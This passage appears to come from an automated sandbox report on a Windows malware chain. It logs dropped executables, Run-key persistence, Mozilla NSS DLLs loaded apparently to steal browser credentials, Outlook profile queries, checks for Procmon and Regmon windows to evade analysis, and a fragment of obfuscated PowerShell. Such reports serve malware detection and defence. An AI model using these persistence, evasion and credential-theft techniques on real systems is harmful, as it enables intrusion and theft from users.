Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Google Drive.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1815040 > 1048576
Source: file.exe Static PE information: Raw size of xxdbzcjj is bigger than: 0x100000 < 0x1a1600
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0ac2a0f3ae.exe, 00000024.00000002.3119535099.0000000000A12000.00000040.00000001.01000000.00000019.sdmp, 0ac2a0f3ae.exe, 00000024.00000003.2983049780.0000000004F00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.390000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW;
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Unpacked PE file: 20.2.DocumentsECAFHIIJJE.exe.720000.0.unpack :EW;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 21.2.skotes.exe.fe0000.0.unpack :EW;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 23.2.skotes.exe.fe0000.0.unpack :EW;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;lwvftjpd:EW;ppdaehht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Unpacked PE file: 24.2.file1.exe.7f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ytlmplcn:EW;gdxiagsi:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ytlmplcn:EW;gdxiagsi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Unpacked PE file: 30.2.4136f86ac7.exe.c10000.1.unpack :EW;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Unpacked PE file: 31.2.3160604f40.exe.50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Unpacked PE file: 36.2.0ac2a0f3ae.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;yficgynw:EW;ryhifnco:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Unpacked PE file: 37.2.4136f86ac7.exe.c10000.0.unpack :EW;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Unpacked PE file: 38.2.3160604f40.exe.50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xxdbzcjj:EW;txsnlhpz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Unpacked PE file: 39.2.0ac2a0f3ae.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W;yficgynw:EW;ryhifnco:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Unpacked PE file: 40.2.4136f86ac7.exe.c10000.0.unpack :EW;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cwahjnig:EW;dpfgpfkz:EW;.taggant:EW;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Key)$ivBytes = [Conv'$decoded += $U1wK7PYc1Ca2$Kvt8oekCIi2L = 'ert]::FromBase64String($IV)$encryptedBy'$decoded += $Kvt8oekCIi2L$GNHT65Ml89Vm = 'tes = [Convert]::FromBase64String($En
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C68C410
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 0ac2a0f3ae.exe.23.dr Static PE information: real checksum: 0x2acccc should be: 0x2a9f1d
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: real checksum: 0x324fbd should be: 0x32a75a
Source: file1[1].exe.23.dr Static PE information: real checksum: 0x1da948 should be: 0x1d3849
Source: 4136f86ac7.exe.23.dr Static PE information: real checksum: 0x311d1a should be: 0x3136e2
Source: random[1].exe.23.dr Static PE information: real checksum: 0x2acccc should be: 0x2a9f1d
Source: file1.exe.23.dr Static PE information: real checksum: 0x1da948 should be: 0x1d3849
Source: 3160604f40.exe.23.dr Static PE information: real checksum: 0x1c5866 should be: 0x1c07c7
Source: file.exe Static PE information: real checksum: 0x1c5866 should be: 0x1c07c7
Source: random[1].exe.0.dr Static PE information: real checksum: 0x311d1a should be: 0x3136e2
Source: skotes.exe.20.dr Static PE information: real checksum: 0x324fbd should be: 0x32a75a
Source: random[1].exe0.23.dr Static PE information: real checksum: 0x1c5866 should be: 0x1c07c7
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: xxdbzcjj
Source: file.exe Static PE information: section name: txsnlhpz
Source: file.exe Static PE information: section name: .taggant
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name:
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name: .idata
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name: lwvftjpd
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name: ppdaehht
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name: cwahjnig
Source: random[1].exe.0.dr Static PE information: section name: dpfgpfkz
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: skotes.exe.20.dr Static PE information: section name:
Source: skotes.exe.20.dr Static PE information: section name: .idata
Source: skotes.exe.20.dr Static PE information: section name: lwvftjpd
Source: skotes.exe.20.dr Static PE information: section name: ppdaehht
Source: skotes.exe.20.dr Static PE information: section name: .taggant
Source: random[1].exe.23.dr Static PE information: section name:
Source: random[1].exe.23.dr Static PE information: section name: .idata
Source: random[1].exe.23.dr Static PE information: section name: yficgynw
Source: random[1].exe.23.dr Static PE information: section name: ryhifnco
Source: random[1].exe.23.dr Static PE information: section name: .taggant
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name:
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name: .idata
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name: yficgynw
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name: ryhifnco
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name: .taggant
Source: file1[1].exe.23.dr Static PE information: section name:
Source: file1[1].exe.23.dr Static PE information: section name: .rsrc
Source: file1[1].exe.23.dr Static PE information: section name: .idata
Source: file1[1].exe.23.dr Static PE information: section name:
Source: file1[1].exe.23.dr Static PE information: section name: ytlmplcn
Source: file1[1].exe.23.dr Static PE information: section name: gdxiagsi
Source: file1[1].exe.23.dr Static PE information: section name: .taggant
Source: file1.exe.23.dr Static PE information: section name:
Source: file1.exe.23.dr Static PE information: section name: .rsrc
Source: file1.exe.23.dr Static PE information: section name: .idata
Source: file1.exe.23.dr Static PE information: section name:
Source: file1.exe.23.dr Static PE information: section name: ytlmplcn
Source: file1.exe.23.dr Static PE information: section name: gdxiagsi
Source: file1.exe.23.dr Static PE information: section name: .taggant
Source: 4136f86ac7.exe.23.dr Static PE information: section name:
Source: 4136f86ac7.exe.23.dr Static PE information: section name: .idata
Source: 4136f86ac7.exe.23.dr Static PE information: section name: cwahjnig
Source: 4136f86ac7.exe.23.dr Static PE information: section name: dpfgpfkz
Source: 4136f86ac7.exe.23.dr Static PE information: section name: .taggant
Source: random[1].exe0.23.dr Static PE information: section name:
Source: random[1].exe0.23.dr Static PE information: section name: .rsrc
Source: random[1].exe0.23.dr Static PE information: section name: .idata
Source: random[1].exe0.23.dr Static PE information: section name:
Source: random[1].exe0.23.dr Static PE information: section name: xxdbzcjj
Source: random[1].exe0.23.dr Static PE information: section name: txsnlhpz
Source: random[1].exe0.23.dr Static PE information: section name: .taggant
Source: 3160604f40.exe.23.dr Static PE information: section name:
Source: 3160604f40.exe.23.dr Static PE information: section name: .rsrc
Source: 3160604f40.exe.23.dr Static PE information: section name: .idata
Source: 3160604f40.exe.23.dr Static PE information: section name:
Source: 3160604f40.exe.23.dr Static PE information: section name: xxdbzcjj
Source: 3160604f40.exe.23.dr Static PE information: section name: txsnlhpz
Source: 3160604f40.exe.23.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B536 push ecx; ret 0_2_6C65B549
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_0073D91C push ecx; ret 20_2_0073D92F
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_00731359 push es; ret 20_2_0073135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_00FFD91C push ecx; ret 21_2_00FFD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_00FEBA83 push ss; retf 21_2_00FEBA85
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00FFD91C push ecx; ret 23_2_00FFD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00FFDFC6 push ecx; ret 23_2_00FFDFD9
Source: file.exe Static PE information: section name: xxdbzcjj entropy: 7.9542877120760425
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name: entropy: 7.052460894096881
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.049831354626162
Source: skotes.exe.20.dr Static PE information: section name: entropy: 7.052460894096881
Source: random[1].exe.23.dr Static PE information: section name: entropy: 7.799529425951728
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name: entropy: 7.799529425951728
Source: file1[1].exe.23.dr Static PE information: section name: entropy: 7.967430741794287
Source: file1[1].exe.23.dr Static PE information: section name: ytlmplcn entropy: 7.953162268272761
Source: file1.exe.23.dr Static PE information: section name: entropy: 7.967430741794287
Source: file1.exe.23.dr Static PE information: section name: ytlmplcn entropy: 7.953162268272761
Source: 4136f86ac7.exe.23.dr Static PE information: section name: entropy: 7.049831354626162
Source: random[1].exe0.23.dr Static PE information: section name: xxdbzcjj entropy: 7.9542877120760425
Source: 3160604f40.exe.23.dr Static PE information: section name: xxdbzcjj entropy: 7.9542877120760425

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsECAFHIIJJE.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Jump to dropped file
Source: C:\Users\user\DocumentsECAFHIIJJE.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsECAFHIIJJE.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\file1[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsECAFHIIJJE.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3160604f40.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0ac2a0f3ae.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4136f86ac7.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsECAFHIIJJE.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: RegmonClass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: Regmonclass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: Filemonclass
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: FilemonClass
